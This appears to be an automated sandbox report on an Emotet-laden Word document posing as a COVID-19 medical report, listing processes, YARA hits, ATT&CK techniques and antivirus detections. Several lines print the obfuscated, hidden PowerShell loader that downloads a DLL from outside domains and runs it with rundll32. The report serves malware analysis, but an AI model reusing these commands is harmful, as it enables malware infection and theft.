JwB0AGkAJwArACgAJwB2AHIAaQBuAGQAJwArACcALgAnACsAJwBjAG8AbQAvAGMAJwApACsAJwBnACcAKwAoACcAaQAnACsAJwAtAGIAaQBuACcAKQArACgAJwAvACcAKwAnAEoAQgBiAGIAJwArACcAOAAnACsAJwAvACEAeAAgAFsAIAAnACkAKwAnAHMAaAAnACsAKAAnACAAYgAnACsAJwA6ACcAKQArACgAJwAvACcAKwAnAC8AdgBhAG4AJwArACcAZABkAG4AYQAnACkAKwAoACcAYgBoAGEAcgBnACcAKwAnAGEAJwApACsAJwB2AGUAJwArACgAJwAuAGMAJwArACcAbwAnACkAKwAoACcAbQAvAGEAcwBzACcAKwAnAGUAdAAnACkAKwAnAC8AVwAnACsAKAAnADkAbwAnACsAJwAvAC	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\rundll32.exe 'C:\Windows\system32\rundll32.exe' C:\Users\user\Nk2duhb\Gxlh9ia\E6_R.dll AnyString	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\system32\rundll32.exe' C:\Users\user\Nk2duhb\Gxlh9ia\E6_R.dll AnyString	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Users\user\Nk2duhb\Gxlh9ia\E6_R.dll',#1	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Dgmlr\ngcj.eda',hyhQYxhuLCMLb	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Dgmlr\ngcj.eda',#1	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Zfrhfthwazxcccc\whpjzcoocbdvfd.agu',nCbdzah	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Zfrhfthwazxcccc\whpjzcoocbdvfd.agu',#1	Jump to behavior

Source: unknown	Process created: C:\Windows\System32\cmd.exe cmd cmd /c m^s^g %username% /v Wo^rd exp^erien^ced an er^ror tryi^ng to op^en th^e fi^le. & p^owe^rs^he^ll^ -w hi^dd^en -^e^nc IAAgAFMAdgAgACAAUABCADUAbwAgACAAKABbAFQAWQBwAEUAXQAoACIAewAyAH0AewAxAH0AewA1AH0AewAzAH0AewAwAH0AewA2AH0AewA0AH0AIgAgAC0ARgAgACcAVAAnACwAJwBFAE0ALgBJACcALAAnAFMAWQBzAFQAJwAsACcAZQBDACcALAAnAHkAJwAsACcAbwAuAEQASQBSACcALAAnAE8AUgAnACkAIAApACAAOwAgACAAUwBFAHQALQBJAFQARQBtACAAdgBBAFIASQBhAEIATABlADoAbQA3AGEAOQAgACgAWwB0AHkAcABFAF0AKAAiAHsANAB9AHsAMgB9AHsAMwB9AHsANQB9AHsAMQB9AHsANgB9AHsAMAB9AHsANwB9ACIAIAAtAGYAJwBuACcALAAnAEkAQwBFAHAATwBJAE4AdABtACcALAAnAG4AZQBUACcALAAnAC4AJwAsACcAcwB5AFMAdABlAE0ALgAnACwAJwBzAEUAUgB2ACcALAAnAEEAJwAsACcAYQBHAGUAcgAnACkAIAApACAAIAA7ACAAIAAkAEkAaAB2ADgAOQBfAGcAPQAkAE0AOQAxAEcAIAArACAAWwBjAGgAYQByAF0AKAAzADMAKQAgACsAIAAkAEgAMgAzAEQAOwAkAEQAOQA0AE0APQAoACgAJwBQADcAJwArACcAMgAnACkAKwAnAFgAJwApADsAIAAoAGcARQBUAC0AdgBhAHIAaQBhAEIAbABlACAAcABiADUAbwAgAC0AVgBBACkAOgA6ACIAYwByAEUAYQBUAGUAZABpAGAAUgBlAEMAdABgAG8AUgBZACIAKAAkAEgATwBNAEUAIAArACAAKAAoACgAJwA5AGsAJwArACcAdABOAGsAJwApACsAJwAyACcAKwAnAGQAJwArACgAJwB1AGgAYgA5ACcAKwAnAGsAdAAnACsAJwBHAHgAbABoACcAKQArACgAJwA5AGkAJwArACcAYQA5AGsAdAAnACkAKQAuACIAcgBFAGAAUABsAGEAQwBlACIAKAAoACcAOQAnACsAJwBrAHQAJwApACwAJwBcACcAKQApACkAOwAkAEoAOAA3AEgAPQAoACcAUwAnACsAKAAnADMANgAnACsAJwBOACcAKQApADsAIAAoACAAIAB2AGEAUgBJAGEAYgBsAGUAIAAgAE0ANwBhADkAIAAgAC0AVgBBACAAIAApADoAOgAiAFMARQBjAHUAcgBpAFQAWQBwAGAAUgBvAFQAbwBDAGAAbwBMACIAIAA9ACAAKAAoACcAVABsACcAKwAnAHMAJwApACsAJwAxADIAJwApADsAJABYADIAMgBVAD0AKAAnAEUAJwArACgAJwBfACcAKwAnAF8ARQAnACkAKQA7ACQAUAAyADcAcABxAGUAMwAgAD0AIAAoACcARQA2ACcAKwAnAF8AUgAnACkAOwAkAEYAMwA5AEwAPQAoACgAJwBRACcAKwAnADkANAAnACkAKwAnAFcAJwApADsAJABBAGQAMQByAGEAOABuAD0AJABIAE8ATQBFACsAKAAoACgAJwBLAGkAJwArACcAbQAnACkAKwAoACcATgBrADIAZAAnACsAJwB1AGgAYgAnACkAKwAnAEsAaQAnACsAJwBtACcAKwAoACcARwB4ACcAKwAnAGwAJwApACsAJwBoADkAJwArACgAJwBpACcAKwAnAGEASwBpACcAKQArACcAbQAnACkALQBSAGUAUABsAGEAYwBlACgAWwBDAEgAQQBSAF0ANwA1ACsAWwBDAEgAQQBSAF0AMQAwADUAKwBbAEMASABBAFIAXQAxADAAOQApACwAWwBDAEgAQQBSAF0AOQAyACkAKwAkAFAAMgA3AHAAcQBlADMAKwAnAC4AZAAnACAAKwAgACcAbABsACcAOwAkAFYAMgA4AFUAPQAoACcAQwA4ACcAKwAnADgASwAnACkAOwAkAE0AcgBpAHEAZAA1ADkAPQAnAGgAJwAgACsAIAAnAHQAdAAnACAAKwAgACcAcAAnADsAJABLAHcAMwA3ADkANAB4AD0AKAAnAHgAIAAnACsAJwBbACcAKwAoACcAIABzAGgAJwArACcAIAAnACkAKwAoACcAYgAnACsAJwA6AC8ALwBjAGEAYgAuAG0AeQAnACsAJwBrAGYAJwApACsAJwBuAC4AJwArACgAJwBjAG8AbQAnACsAJwAvACcAKQArACcAYQAnACsAKAAnAGQAJwArACcAbQBpAG4AJwApACsAJwAvACcAKwAoACcAWAAvACcAKwAnACEAJwApACsAJwB4ACcAKwAoACcAIAAnACsAJwBbACAAcwAnACkAKwAnAGgAJwArACgAJwAgAGIAJwArACcAOgAnACkAKwAoACcALwAnACsAJwAvAGIAaABhACcAKQArACcAawAnACsAJwB0AGkAJwArACgAJwB2AHIAaQBuAGQAJwArACcALgAnACsAJwBjAG8AbQAvAGMAJwApACsAJwBnACcAKwAoACcAaQAnACsAJwAtAGIAaQBuACcAKQArACgAJwAvACcAKwAnAEoAQgBiAGIAJwArACcAOAAnACsAJwAvACEAeAAgAFsAIAAnACkAKwAnAHMAaAAnACsAKAAnACAAYgAnACsAJwA6ACcAKQArACgAJwAvACcAKwAnAC8AdgBhAG4AJwArACcAZABkAG4AYQAnACkAKwAoACcAYgBoAGEAcgBnACcAKwAnAGEAJwApACsAJwB2AGUAJwArACgAJwAuAGMAJwArACcAbwAnACkAKwAoACcA
Source: unknown	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -w hidden -enc IAAgAFMAdgAgACAAUABCADUAbwAgACAAKABbAFQAWQBwAEUAXQAoACIAewAyAH0AewAxAH0AewA1AH0AewAzAH0AewAwAH0AewA2AH0AewA0AH0AIgAgAC0ARgAgACcAVAAnACwAJwBFAE0ALgBJACcALAAnAFMAWQBzAFQAJwAsACcAZQBDACcALAAnAHkAJwAsACcAbwAuAEQASQBSACcALAAnAE8AUgAnACkAIAApACAAOwAgACAAUwBFAHQALQBJAFQARQBtACAAdgBBAFIASQBhAEIATABlADoAbQA3AGEAOQAgACgAWwB0AHkAcABFAF0AKAAiAHsANAB9AHsAMgB9AHsAMwB9AHsANQB9AHsAMQB9AHsANgB9AHsAMAB9AHsANwB9ACIAIAAtAGYAJwBuACcALAAnAEkAQwBFAHAATwBJAE4AdABtACcALAAnAG4AZQBUACcALAAnAC4AJwAsACcAcwB5AFMAdABlAE0ALgAnACwAJwBzAEUAUgB2ACcALAAnAEEAJwAsACcAYQBHAGUAcgAnACkAIAApACAAIAA7ACAAIAAkAEkAaAB2ADgAOQBfAGcAPQAkAE0AOQAxAEcAIAArACAAWwBjAGgAYQByAF0AKAAzADMAKQAgACsAIAAkAEgAMgAzAEQAOwAkAEQAOQA0AE0APQAoACgAJwBQADcAJwArACcAMgAnACkAKwAnAFgAJwApADsAIAAoAGcARQBUAC0AdgBhAHIAaQBhAEIAbABlACAAcABiADUAbwAgAC0AVgBBACkAOgA6ACIAYwByAEUAYQBUAGUAZABpAGAAUgBlAEMAdABgAG8AUgBZACIAKAAkAEgATwBNAEUAIAArACAAKAAoACgAJwA5AGsAJwArACcAdABOAGsAJwApACsAJwAyACcAKwAnAGQAJwArACgAJwB1AGgAYgA5ACcAKwAnAGsAdAAnACsAJwBHAHgAbABoACcAKQArACgAJwA5AGkAJwArACcAYQA5AGsAdAAnACkAKQAuACIAcgBFAGAAUABsAGEAQwBlACIAKAAoACcAOQAnACsAJwBrAHQAJwApACwAJwBcACcAKQApACkAOwAkAEoAOAA3AEgAPQAoACcAUwAnACsAKAAnADMANgAnACsAJwBOACcAKQApADsAIAAoACAAIAB2AGEAUgBJAGEAYgBsAGUAIAAgAE0ANwBhADkAIAAgAC0AVgBBACAAIAApADoAOgAiAFMARQBjAHUAcgBpAFQAWQBwAGAAUgBvAFQAbwBDAGAAbwBMACIAIAA9ACAAKAAoACcAVABsACcAKwAnAHMAJwApACsAJwAxADIAJwApADsAJABYADIAMgBVAD0AKAAnAEUAJwArACgAJwBfACcAKwAnAF8ARQAnACkAKQA7ACQAUAAyADcAcABxAGUAMwAgAD0AIAAoACcARQA2ACcAKwAnAF8AUgAnACkAOwAkAEYAMwA5AEwAPQAoACgAJwBRACcAKwAnADkANAAnACkAKwAnAFcAJwApADsAJABBAGQAMQByAGEAOABuAD0AJABIAE8ATQBFACsAKAAoACgAJwBLAGkAJwArACcAbQAnACkAKwAoACcATgBrADIAZAAnACsAJwB1AGgAYgAnACkAKwAnAEsAaQAnACsAJwBtACcAKwAoACcARwB4ACcAKwAnAGwAJwApACsAJwBoADkAJwArACgAJwBpACcAKwAnAGEASwBpACcAKQArACcAbQAnACkALQBSAGUAUABsAGEAYwBlACgAWwBDAEgAQQBSAF0ANwA1ACsAWwBDAEgAQQBSAF0AMQAwADUAKwBbAEMASABBAFIAXQAxADAAOQApACwAWwBDAEgAQQBSAF0AOQAyACkAKwAkAFAAMgA3AHAAcQBlADMAKwAnAC4AZAAnACAAKwAgACcAbABsACcAOwAkAFYAMgA4AFUAPQAoACcAQwA4ACcAKwAnADgASwAnACkAOwAkAE0AcgBpAHEAZAA1ADkAPQAnAGgAJwAgACsAIAAnAHQAdAAnACAAKwAgACcAcAAnADsAJABLAHcAMwA3ADkANAB4AD0AKAAnAHgAIAAnACsAJwBbACcAKwAoACcAIABzAGgAJwArACcAIAAnACkAKwAoACcAYgAnACsAJwA6AC8ALwBjAGEAYgAuAG0AeQAnACsAJwBrAGYAJwApACsAJwBuAC4AJwArACgAJwBjAG8AbQAnACsAJwAvACcAKQArACcAYQAnACsAKAAnAGQAJwArACcAbQBpAG4AJwApACsAJwAvACcAKwAoACcAWAAvACcAKwAnACEAJwApACsAJwB4ACcAKwAoACcAIAAnACsAJwBbACAAcwAnACkAKwAnAGgAJwArACgAJwAgAGIAJwArACcAOgAnACkAKwAoACcALwAnACsAJwAvAGIAaABhACcAKQArACcAawAnACsAJwB0AGkAJwArACgAJwB2AHIAaQBuAGQAJwArACcALgAnACsAJwBjAG8AbQAvAGMAJwApACsAJwBnACcAKwAoACcAaQAnACsAJwAtAGIAaQBuACcAKQArACgAJwAvACcAKwAnAEoAQgBiAGIAJwArACcAOAAnACsAJwAvACEAeAAgAFsAIAAnACkAKwAnAHMAaAAnACsAKAAnACAAYgAnACsAJwA6ACcAKQArACgAJwAvACcAKwAnAC8AdgBhAG4AJwArACcAZABkAG4AYQAnACkAKwAoACcAYgBoAGEAcgBnACcAKwAnAGEAJwApACsAJwB2AGUAJwArACgAJwAuAGMAJwArACcAbwAnACkAKwAoACcAbQAvAGEAcwBzACcAKwAnAGUAdAAnACkAKwAnAC8AVwAnACsAKAAnADkAbwAnACsAJwAvAC
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -w hidden -enc IAAgAFMAdgAgACAAUABCADUAbwAgACAAKABbAFQAWQBwAEUAXQAoACIAewAyAH0AewAxAH0AewA1AH0AewAzAH0AewAwAH0AewA2AH0AewA0AH0AIgAgAC0ARgAgACcAVAAnACwAJwBFAE0ALgBJACcALAAnAFMAWQBzAFQAJwAsACcAZQBDACcALAAnAHkAJwAsACcAbwAuAEQASQBSACcALAAnAE8AUgAnACkAIAApACAAOwAgACAAUwBFAHQALQBJAFQARQBtACAAdgBBAFIASQBhAEIATABlADoAbQA3AGEAOQAgACgAWwB0AHkAcABFAF0AKAAiAHsANAB9AHsAMgB9AHsAMwB9AHsANQB9AHsAMQB9AHsANgB9AHsAMAB9AHsANwB9ACIAIAAtAGYAJwBuACcALAAnAEkAQwBFAHAATwBJAE4AdABtACcALAAnAG4AZQBUACcALAAnAC4AJwAsACcAcwB5AFMAdABlAE0ALgAnACwAJwBzAEUAUgB2ACcALAAnAEEAJwAsACcAYQBHAGUAcgAnACkAIAApACAAIAA7ACAAIAAkAEkAaAB2ADgAOQBfAGcAPQAkAE0AOQAxAEcAIAArACAAWwBjAGgAYQByAF0AKAAzADMAKQAgACsAIAAkAEgAMgAzAEQAOwAkAEQAOQA0AE0APQAoACgAJwBQADcAJwArACcAMgAnACkAKwAnAFgAJwApADsAIAAoAGcARQBUAC0AdgBhAHIAaQBhAEIAbABlACAAcABiADUAbwAgAC0AVgBBACkAOgA6ACIAYwByAEUAYQBUAGUAZABpAGAAUgBlAEMAdABgAG8AUgBZACIAKAAkAEgATwBNAEUAIAArACAAKAAoACgAJwA5AGsAJwArACcAdABOAGsAJwApACsAJwAyACcAKwAnAGQAJwArACgAJwB1AGgAYgA5ACcAKwAnAGsAdAAnACsAJwBHAHgAbABoACcAKQArACgAJwA5AGkAJwArACcAYQA5AGsAdAAnACkAKQAuACIAcgBFAGAAUABsAGEAQwBlACIAKAAoACcAOQAnACsAJwBrAHQAJwApACwAJwBcACcAKQApACkAOwAkAEoAOAA3AEgAPQAoACcAUwAnACsAKAAnADMANgAnACsAJwBOACcAKQApADsAIAAoACAAIAB2AGEAUgBJAGEAYgBsAGUAIAAgAE0ANwBhADkAIAAgAC0AVgBBACAAIAApADoAOgAiAFMARQBjAHUAcgBpAFQAWQBwAGAAUgBvAFQAbwBDAGAAbwBMACIAIAA9ACAAKAAoACcAVABsACcAKwAnAHMAJwApACsAJwAxADIAJwApADsAJABYADIAMgBVAD0AKAAnAEUAJwArACgAJwBfACcAKwAnAF8ARQAnACkAKQA7ACQAUAAyADcAcABxAGUAMwAgAD0AIAAoACcARQA2ACcAKwAnAF8AUgAnACkAOwAkAEYAMwA5AEwAPQAoACgAJwBRACcAKwAnADkANAAnACkAKwAnAFcAJwApADsAJABBAGQAMQByAGEAOABuAD0AJABIAE8ATQBFACsAKAAoACgAJwBLAGkAJwArACcAbQAnACkAKwAoACcATgBrADIAZAAnACsAJwB1AGgAYgAnACkAKwAnAEsAaQAnACsAJwBtACcAKwAoACcARwB4ACcAKwAnAGwAJwApACsAJwBoADkAJwArACgAJwBpACcAKwAnAGEASwBpACcAKQArACcAbQAnACkALQBSAGUAUABsAGEAYwBlACgAWwBDAEgAQQBSAF0ANwA1ACsAWwBDAEgAQQBSAF0AMQAwADUAKwBbAEMASABBAFIAXQAxADAAOQApACwAWwBDAEgAQQBSAF0AOQAyACkAKwAkAFAAMgA3AHAAcQBlADMAKwAnAC4AZAAnACAAKwAgACcAbABsACcAOwAkAFYAMgA4AFUAPQAoACcAQwA4ACcAKwAnADgASwAnACkAOwAkAE0AcgBpAHEAZAA1ADkAPQAnAGgAJwAgACsAIAAnAHQAdAAnACAAKwAgACcAcAAnADsAJABLAHcAMwA3ADkANAB4AD0AKAAnAHgAIAAnACsAJwBbACcAKwAoACcAIABzAGgAJwArACcAIAAnACkAKwAoACcAYgAnACsAJwA6AC8ALwBjAGEAYgAuAG0AeQAnACsAJwBrAGYAJwApACsAJwBuAC4AJwArACgAJwBjAG8AbQAnACsAJwAvACcAKQArACcAYQAnACsAKAAnAGQAJwArACcAbQBpAG4AJwApACsAJwAvACcAKwAoACcAWAAvACcAKwAnACEAJwApACsAJwB4ACcAKwAoACcAIAAnACsAJwBbACAAcwAnACkAKwAnAGgAJwArACgAJwAgAGIAJwArACcAOgAnACkAKwAoACcALwAnACsAJwAvAGIAaABhACcAKQArACcAawAnACsAJwB0AGkAJwArACgAJwB2AHIAaQBuAGQAJwArACcALgAnACsAJwBjAG8AbQAvAGMAJwApACsAJwBnACcAKwAoACcAaQAnACsAJwAtAGIAaQBuACcAKQArACgAJwAvACcAKwAnAEoAQgBiAGIAJwArACcAOAAnACsAJwAvACEAeAAgAFsAIAAnACkAKwAnAHMAaAAnACsAKAAnACAAYgAnACsAJwA6ACcAKQArACgAJwAvACcAKwAnAC8AdgBhAG4AJwArACcAZABkAG4AYQAnACkAKwAoACcAYgBoAGEAcgBnACcAKwAnAGEAJwApACsAJwB2AGUAJwArACgAJwAuAGMAJwArACcAbwAnACkAKwAoACcAbQAvAGEAcwBzACcAKwAnAGUAdAAnACkAKwAnAC8AVwAnACsAKAAnADkAbwAnACsAJwAvAC	Jump to behavior

Language, Device and Operating System Detection:

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\powershell_ise.exe VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\hh.exe VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior

Source: C:\Windows\SysWOW64\rundll32.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Stealing of Sensitive Information:

Yara detected Emotet

Show sources

Source: Yara match	File source: 00000008.00000002.2121216068.0000000000290000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.2110577655.0000000000230000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000002.2145222435.00000000001A0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000002.2334223344.0000000000160000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.2121359913.0000000000700000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.2122851678.0000000010000000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000002.2145232978.00000000001C0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000002.2155705121.00000000001D0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000002.2335867328.0000000010000000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.2110590102.0000000000250000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000002.2155718494.0000000000200000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.2131220245.0000000000150000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.2131240758.0000000000170000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000002.2334238430.0000000000180000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000002.2149683472.0000000010000000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.2133987769.0000000010000000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.2111395088.0000000010000000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000002.2156224518.0000000010000000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 11.2.rundll32.exe.1d0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.rundll32.exe.10000000.8.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.rundll32.exe.150000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.2.rundll32.exe.290000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.2.rundll32.exe.10000000.11.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.2.rundll32.exe.1c0000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.2.rundll32.exe.200000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.rundll32.exe.10000000.8.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.2.rundll32.exe.180000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.rundll32.exe.10000000.8.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.2.rundll32.exe.1c0000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.2.rundll32.exe.10000000.8.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.rundll32.exe.250000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.rundll32.exe.10000000.8.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.rundll32.exe.230000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.2.rundll32.exe.290000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.rundll32.exe.230000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.2.rundll32.exe.10000000.12.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.2.rundll32.exe.10000000.12.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.2.rundll32.exe.1a0000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.rundll32.exe.170000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.2.rundll32.exe.10000000.11.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.2.rundll32.exe.10000000.8.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.2.rundll32.exe.700000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.rundll32.exe.150000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.2.rundll32.exe.180000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.2.rundll32.exe.200000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.2.rundll32.exe.1d0000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.2.rundll32.exe.160000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.rundll32.exe.170000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.2.rundll32.exe.1a0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.rundll32.exe.250000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.2.rundll32.exe.700000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.2.rundll32.exe.10000000.12.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.2.rundll32.exe.10000000.12.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.2.rundll32.exe.160000.0.unpack, type: UNPACKEDPE

Mitre Att&ck Matrix

Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Exfiltration	Command and Control	Network Effects	Remote Service Effects	Impact
Valid Accounts	Windows Management Instrumentation11	Path Interception	Process Injection111	Masquerading21	OS Credential Dumping	Security Software Discovery11	Remote Services	Archive Collected Data1	Exfiltration Over Other Network Medium	Encrypted Channel1	Eavesdrop on Insecure Network Communication	Remotely Track Device Without Authorization	Modify System Partition
Default Accounts	Command and Scripting Interpreter211	Boot or Logon Initialization Scripts	Boot or Logon Initialization Scripts	Virtualization/Sandbox Evasion2	LSASS Memory	Virtualization/Sandbox Evasion2	Remote Desktop Protocol	Data from Removable Media	Exfiltration Over Bluetooth	Non-Standard Port1	Exploit SS7 to Redirect Phone Calls/SMS	Remotely Wipe Data Without Authorization	Device Lockout
Domain Accounts	Scripting32	Logon Script (Windows)	Logon Script (Windows)	Disable or Modify Tools11	Security Account Manager	Process Discovery1	SMB/Windows Admin Shares	Data from Network Shared Drive	Automated Exfiltration	Ingress Tool Transfer4	Exploit SS7 to Track Device Location	Obtain Device Cloud Backups	Delete Device Data
Local Accounts	Exploitation for Client Execution3	Logon Script (Mac)	Logon Script (Mac)	Process Injection111	NTDS	Remote System Discovery1	Distributed Component Object Model	Input Capture	Scheduled Transfer	Non-Application Layer Protocol3	SIM Card Swap		Carrier Billing Fraud
Cloud Accounts	PowerShell3	Network Logon Script	Network Logon Script	Deobfuscate/Decode Files or Information3	LSA Secrets	File and Directory Discovery2	SSH	Keylogging	Data Transfer Size Limits	Application Layer Protocol13	Manipulate Device Communication		Manipulate App Store Rankings or Ratings
Replication Through Removable Media	Launchd	Rc.common	Rc.common	Scripting32	Cached Domain Credentials	System Information Discovery15	VNC	GUI Input Capture	Exfiltration Over C2 Channel	Multiband Communication	Jamming or Denial of Service		Abuse Accessibility Features
External Remote Services	Scheduled Task	Startup Items	Startup Items	Hidden Files and Directories1	DCSync	Network Sniffing	Windows Remote Management	Web Portal Capture	Exfiltration Over Alternative Protocol	Commonly Used Port	Rogue Wi-Fi Access Points		Data Encrypted for Impact
Drive-by Compromise	Command and Scripting Interpreter	Scheduled Task/Job	Scheduled Task/Job	Obfuscated Files or Information11	Proc Filesystem	Network Service Scanning	Shared Webroot	Credential API Hooking	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Application Layer Protocol	Downgrade to Insecure Protocols		Generate Fraudulent Advertising Revenue
Exploit Public-Facing Application	PowerShell	At (Linux)	At (Linux)	Rundll321	/etc/passwd and /etc/shadow	System Network Connections Discovery	Software Deployment Tools	Data Staged	Exfiltration Over Asymmetric Encrypted Non-C2 Protocol	Web Protocols	Rogue Cellular Base Station		Data Destruction

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Source	Detection	Scanner	Label	Link
IU-8549 Medical report COVID-19.doc	63%	Virustotal		Browse
IU-8549 Medical report COVID-19.doc	59%	Metadefender		Browse
IU-8549 Medical report COVID-19.doc	83%	ReversingLabs	Document-Word.Trojan.Emotet

Dropped Files

Source	Detection	Scanner	Label	Link
C:\Users\user\Nk2duhb\Gxlh9ia\E6_R.dll	100%	Joe Sandbox ML
C:\Users\user\Nk2duhb\Gxlh9ia\E6_R.dll	46%	Metadefender		Browse
C:\Users\user\Nk2duhb\Gxlh9ia\E6_R.dll	93%	ReversingLabs	Win32.Trojan.EmotetCrypt

Unpacked PE Files

Source	Detection	Scanner	Label	Download
11.2.rundll32.exe.200000.1.unpack	100%	Avira	HEUR/AGEN.1110387	Download File
12.2.rundll32.exe.10000000.11.unpack	100%	Avira	HEUR/AGEN.1110387	Download File
7.2.rundll32.exe.10000000.8.unpack	100%	Avira	HEUR/AGEN.1110387	Download File
12.2.rundll32.exe.180000.1.unpack	100%	Avira	HEUR/AGEN.1110387	Download File
10.2.rundll32.exe.1c0000.1.unpack	100%	Avira	HEUR/AGEN.1110387	Download File
9.2.rundll32.exe.10000000.8.unpack	100%	Avira	HEUR/AGEN.1110387	Download File
